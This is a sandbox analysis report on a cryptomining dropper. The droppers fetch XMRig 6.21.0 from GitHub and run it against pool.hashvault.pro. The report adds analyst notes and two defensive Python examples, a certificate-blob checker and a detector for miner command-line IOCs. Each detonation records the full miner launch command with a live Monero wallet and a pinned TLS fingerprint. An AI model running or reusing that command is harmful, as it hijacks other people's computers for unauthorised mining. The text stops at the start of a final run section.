Analysis Overview
SHA256
2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293
Threat Level: Known bad
The file packer.zip was found to be: Known bad.
Malicious Activity Summary
xmrig
XMRig Miner payload
Executes dropped EXE
Unsigned PE
Modifies system certificate store
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious behavior: LoadsDriver
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-22 15:12
Signatures
Unsigned PE
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-22 15:12
Reported
2024-05-22 16:22
Platform
win10v2004-20240426-en
Max time kernel
1794s
Max time network
1804s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [serialized certificate blob; the full value is reproduced under behavioral20] | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
Caveat: AuthRoot is the store that the Windows automatic root update mechanism populates, and the blob written here decodes to the public Sectigo/Comodo "AAA Certificate Services" root (friendly name "Sectigo (AAA)", SHA-1 D1EB23A46D17D68FD92564C2F1F1601764D8E349, SHA-256 D7A7A0FB5D7E2731D771E9484EBCDEF71D5F0C3E0A2948782BC83EE0EA699EF4, all visible in the blob). That is consistent with CryptoAPI caching a root it needed while validating the dropper's TLS connections, not with an attacker-controlled root being installed, so treat this signature as context for the GitHub download rather than as the malicious act. A certificate written under ROOT instead of AuthRoot, or a key name and thumbprint that do not hash the stored certificate, would be the version of this event worth chasing.
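The following is an added example, not code from the sandbox report or from any tool it names: a parser for the serialized Blob format CryptoAPI writes under SystemCertificates\<store>\Certificates\<SHA1>. The report's own blob (shown in full under behavioral20) is a sequence of records, each a DWORD property id, a DWORD equal to 1 and a DWORD length followed by the data: hash and identifier properties (0x19, 0x1D, 0x14, 0x0F), the SHA-1 thumbprint (0x03), the friendly name (0x0B, UTF-16 "Sectigo (AAA)"), the SHA-256 (0x62), root-program policies (0x53), enhanced key usage (0x09) and finally the DER certificate (0x20). The sample blob in the code is constructed: it reuses the thumbprint, friendly name and SHA-256 transcribed from the report, but because the page truncates the DER a stand-in byte string takes the certificate's place, which is what lets the thumbprint-versus-content check be shown both passing and failing.

```python
"""Decode a Windows SystemCertificates\\<store>\\Certificates\\<SHA1>\\Blob value.

Added example, not code from the sandbox report. Each record in the blob is
DWORD prop_id, DWORD reserved (always 1), DWORD cb, then cb bytes of data.
The sample blob is constructed: the SHA-1, friendly name and SHA-256 values
are transcribed from the report, the DER certificate is a stand-in.
"""
from __future__ import annotations

import hashlib
import struct

CERT_SHA1_HASH_PROP_ID = 3
CERT_FRIENDLY_NAME_PROP_ID = 11
CERT_CERT_PROP_ID = 32
CERT_AUTH_ROOT_SHA256_HASH_PROP_ID = 98  # 0x62 in the report's blob


def parse_cert_blob(blob: bytes) -> dict[int, bytes]:
    """Walk the property records; raise ValueError on a truncated or malformed blob."""
    props: dict[int, bytes] = {}
    off = 0
    while off < len(blob):
        if len(blob) - off < 12:
            raise ValueError(f"truncated property header at offset {off}")
        prop_id, reserved, cb = struct.unpack_from("<III", blob, off)
        if reserved != 1 or off + 12 + cb > len(blob):
            raise ValueError(f"malformed record prop_id={prop_id} cb={cb} at offset {off}")
        off += 12
        props[prop_id] = blob[off:off + cb]
        off += cb
    return props


def describe_entry(key_name: str, blob: bytes) -> dict:
    """Summarise a Certificates\\<key_name>\\Blob write for triage."""
    props = parse_cert_blob(blob)
    der = props.get(CERT_CERT_PROP_ID, b"")
    der_sha1 = hashlib.sha1(der).hexdigest().upper()
    claimed_sha1 = props.get(CERT_SHA1_HASH_PROP_ID, b"").hex().upper()
    name = props.get(CERT_FRIENDLY_NAME_PROP_ID, b"").decode("utf-16-le").rstrip("\x00")
    return {
        "key_name": key_name.upper(),
        "friendly_name": name,
        "claimed_sha1": claimed_sha1,
        "der_sha1": der_sha1,
        # Key name, stored thumbprint and the hash of the stored DER must all
        # agree; a disagreement means something other than CryptoAPI's normal
        # store write produced the entry, and that is what to chase.
        "thumbprint_consistent": key_name.upper() == claimed_sha1 == der_sha1,
        "has_auth_root_sha256": CERT_AUTH_ROOT_SHA256_HASH_PROP_ID in props,
        "der_len": len(der),
    }


def _record(prop_id: int, data: bytes) -> bytes:
    return struct.pack("<III", prop_id, 1, len(data)) + data


# Values transcribed from the report's Blob (SHA-1, friendly name, SHA-256).
REPORT_SHA1 = bytes.fromhex("d1eb23a46d17d68fd92564c2f1f1601764d8e349")
REPORT_SHA256 = bytes.fromhex("d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4")
REPORT_NAME = "Sectigo (AAA)\x00".encode("utf-16-le")
# Constructed stand-in for the DER certificate, which the page truncates.
FAKE_DER = b"\x30\x82\x04\x32" + bytes(range(256)) * 4


def build_blob(sha1: bytes, der: bytes) -> bytes:
    """Assemble a blob with a subset of the record kinds the report shows, same order."""
    return (_record(CERT_SHA1_HASH_PROP_ID, sha1)
            + _record(CERT_FRIENDLY_NAME_PROP_ID, REPORT_NAME)
            + _record(CERT_AUTH_ROOT_SHA256_HASH_PROP_ID, REPORT_SHA256)
            + _record(CERT_CERT_PROP_ID, der))


def sample_entries() -> dict[str, tuple[str, bytes]]:
    """Two constructed writes: one self-consistent, one whose key name and stored
    thumbprint (the report's) do not hash the stored DER."""
    fake_sha1 = hashlib.sha1(FAKE_DER).hexdigest()
    return {
        "consistent": (fake_sha1, build_blob(bytes.fromhex(fake_sha1), FAKE_DER)),
        "mismatched": (REPORT_SHA1.hex(), build_blob(REPORT_SHA1, FAKE_DER)),
    }


if __name__ == "__main__":
    for label, (key_name, blob) in sample_entries().items():
        print(label, describe_entry(key_name, blob))
```

Run against a blob exported from a live host (for example the value read back from the registry), the "consistent" result is the normal case; the "mismatched" case only arises here because the stand-in certificate is not the real AAA root, and on a real host it is the signal that the store entry was not produced by CryptoAPI from the certificate it claims to hold.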
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Note: SeLockMemoryPrivilege ("Lock pages in memory") is the privilege XMRig enables so it can back its RandomX dataset with large pages; the same adjustment is logged twice in this run. Few legitimate user-mode programs enable it, so the privilege name alone is a usable detection pivot.
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4024 wrote to memory of 4164 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Note: the only recorded writes go from the dropper (PID 4024) into the xmrig.exe process it spawned (PID 4164; the same pair is logged twice), which is consistent with a parent writing into the child it has just created. No write into an unrelated, already running process was captured, so this run is a drop-and-execute chain rather than injection.
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Reading the miner command line: --url names the pool (pool.hashvault.pro, port 80), --user carries the 95-character Monero address that is paid for the work, --pass T is the worker password, --donate-level 1 sets the developer fee to 1%, and --tls together with --tls-fingerprint forces TLS and pins the pool certificate to the given SHA-256. Because of --tls the traffic on port 80 is a TLS handshake rather than HTTP, so a port/protocol mismatch rule catches it. The relative path shows the dropper launched the miner from its own working directory. The wallet address and the pinned fingerprint are the durable indicators; the pool IP differs between runs (95.179.241.203 here, 45.76.89.70 in the other detonations).
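Detection logic for command lines of this shape, as an added example that is neither the sandbox's nor XMRig's own code: it tokenises a process-creation command line, extracts the pool, wallet, TLS flag and pinned fingerprint, and only flags a record when a pool/wallet pair is accompanied by a Monero-shaped address or a miner-specific flag, which keeps `curl --url ... --user ...` style lines out. The (image, command line) event list in the block is constructed; its first entry reproduces the xmrig.exe command line above, the others are benign filler.

```python
"""Extract cryptominer IOCs from process command lines (XMRig-style flags).

Added example, not part of the sandbox report. SAMPLE_EVENTS is constructed;
its first entry reproduces the xmrig.exe command line recorded in the report.
"""
from __future__ import annotations

import re
import shlex
from dataclasses import dataclass, field

# Monero addresses: 95 base58 characters (no 0, O, I, l), starting with 4 or 8.
_BASE58_95 = re.compile(r"^[1-9A-HJ-NP-Za-km-z]{95}$")
_POOL_OPTS = {"--url", "-o"}
_USER_OPTS = {"--user", "-u"}
_PIN_OPTS = {"--tls-fingerprint"}
_MINER_FLAGS = {"--donate-level", "--tls", "--coin", "--algo", "-a", "--randomx-1gb-pages"}


@dataclass
class MinerIOCs:
    image: str
    pool_host: str | None = None
    pool_port: int | None = None
    wallet: str | None = None
    wallet_looks_monero: bool = False
    tls: bool = False
    tls_fingerprint: str | None = None
    flags_seen: list[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # pool + wallet is the minimum shape of a miner launch, but plenty of
        # tools take --url/--user, so also require a Monero-shaped address or
        # a flag only miners use.
        return (self.pool_host is not None and self.wallet is not None
                and (self.wallet_looks_monero or bool(self.flags_seen)))


def _split_opt(tok: str) -> tuple[str, str | None]:
    """'--url=host:port' -> ('--url', 'host:port'); any other token -> (tok, None)."""
    if tok.startswith("--") and "=" in tok:
        key, val = tok.split("=", 1)
        return key, val
    return tok, None


def parse_miner_cmdline(cmdline: str) -> MinerIOCs:
    # posix=False keeps Windows backslash paths intact.
    toks = shlex.split(cmdline, posix=False)
    ioc = MinerIOCs(image=toks[0].strip('"') if toks else "")
    i = 1
    while i < len(toks):
        key, val = _split_opt(toks[i])
        consumed = 1
        if val is None and key in (_POOL_OPTS | _USER_OPTS | _PIN_OPTS) and i + 1 < len(toks):
            val, consumed = toks[i + 1], 2
        if key in _POOL_OPTS and val:
            host = val.split("://", 1)[-1]  # drop stratum+tcp:// and friends
            if ":" in host and host.rsplit(":", 1)[1].isdigit():
                host, port = host.rsplit(":", 1)
                ioc.pool_port = int(port)
            ioc.pool_host = host
        elif key in _USER_OPTS and val:
            ioc.wallet = val.split(".", 1)[0]  # pools accept "wallet.worker"
            ioc.wallet_looks_monero = bool(_BASE58_95.match(ioc.wallet)) and ioc.wallet[0] in "48"
        elif key in _PIN_OPTS and val:
            ioc.tls_fingerprint = val.lower()
        elif key == "--tls":
            ioc.tls = True
        if key in _MINER_FLAGS or key in _PIN_OPTS:
            ioc.flags_seen.append(key)
        i += consumed
    return ioc


# Constructed process-creation records: (image name, command line).
SAMPLE_EVENTS = [
    ("xmrig.exe",
     r"xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14"),
    ("svchost.exe", r"C:\Windows\System32\svchost.exe -k netsvcs -p -s Schedule"),
    ("curl.exe", r"curl.exe --url https://example.test/health --user admin:pw"),
]


def scan_events(events) -> list[MinerIOCs]:
    """Return the IOC records for every event whose command line looks like a miner launch."""
    return [ioc for _, cmdline in events if (ioc := parse_miner_cmdline(cmdline)).suspicious]


if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print(hit)
```

Feed it the CommandLine field of Sysmon Event ID 1 or Security 4688 records; the wallet and the pinned fingerprint from the hits are the values to search for across the estate, since the pool hostname and IP are the easiest parts for the operator to change.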
Network
The 8.8.8.8 lookups and the in-addr.arpa reverse queries are resolver activity of the sandbox, and the bing.com connections are background traffic of the Windows image. The rows that matter are github.com and objects.githubusercontent.com (the release-asset host; the dropped path xmrig-6.21.0\xmrig.exe matches the folder layout of the XMRig 6.21.0 release archive) followed by pool.hashvault.pro:80, the mining connection.
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.179.89.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Memory dumps of xmrig.exe (PID 4164), indices 16-84, grouped by region (file names follow memory/4164-<index>-<start>-<end>-memory.dmp):
| Region | Size | Dump indices |
| 0x00007FF6C4EE0000-0x00007FF6C59E3000 | 0xB03000 | 18, 21-23, 26-84 (0x7FF6... range typical of the main image mapping, dumped repeatedly over the run) |
| 0x000001CE9FD50000-0x000001CE9FD70000 | 0x20000 | 16 |
| 0x000001CE9FDA0000-0x000001CE9FDC0000 | 0x20000 | 17 |
| 0x000001CE9FDC0000-0x000001CE9FDE0000 | 0x20000 | 19, 24 |
| 0x000001CE9FDE0000-0x000001CE9FE00000 | 0x20000 | 20, 25 |
Analysis: behavioral12
Detonation Overview
Submitted
2024-05-22 15:12
Reported
2024-05-22 16:22
Platform
win10v2004-20240426-en
Max time kernel
1792s
Max time network
1787s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3508 wrote to memory of 2928 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| NL | 23.62.61.106:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| NL | 23.62.61.75:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 75.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.136.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Memory dumps of xmrig.exe (PID 2928), indices 16-84, grouped by region (file names follow memory/2928-<index>-<start>-<end>-memory.dmp):
| Region | Size | Dump indices |
| 0x00007FF6F0E70000-0x00007FF6F1973000 | 0xB03000 | 18, 21-23, 26-84 (0x7FF6... range typical of the main image mapping, dumped repeatedly over the run) |
| 0x000002118EC10000-0x000002118EC30000 | 0x20000 | 16 |
| 0x000002118EEA0000-0x000002118EEC0000 | 0x20000 | 17 |
| 0x0000021190680000-0x00000211906A0000 | 0x20000 | 20, 25 |
| 0x00000211906A0000-0x00000211906C0000 | 0x20000 | 19, 24 |
Analysis: behavioral17
Detonation Overview
Submitted
2024-05-22 15:12
Reported
2024-05-22 16:24
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1783s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 796 wrote to memory of 2140 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.116.69.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Memory dumps of xmrig.exe (PID 2140), indices 16-84, grouped by region (file names follow memory/2140-<index>-<start>-<end>-memory.dmp):
| Region | Size | Dump indices |
| 0x00007FF637D10000-0x00007FF638813000 | 0xB03000 | 18, 21-22, 24, 26-84 (0x7FF6... range typical of the main image mapping, dumped repeatedly over the run) |
| 0x000002228D5B0000-0x000002228D5D0000 | 0x20000 | 16 |
| 0x000002228D600000-0x000002228D620000 | 0x20000 | 17 |
| 0x000002228D620000-0x000002228D640000 | 0x20000 | 19, 23 |
| 0x000002228D640000-0x000002228D660000 | 0x20000 | 20, 25 |
Analysis: behavioral20
Detonation Overview
Submitted
2024-05-22 15:12
Reported
2024-05-22 16:33
Platform
win10v2004-20240426-en
Max time kernel
1796s
Max time network
1798s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 964 wrote to memory of 2484 | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 964 wrote to memory of 2484 | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main.exe
"C:\Users\Admin\AppData\Local\Temp\main.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| NL | 23.62.61.160:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 160.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.160:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 52.111.229.48:443 | | tcp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-22 15:12
Reported
2024-05-22 16:22
Platform
win10v2004-20240426-en
Max time kernel
1797s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
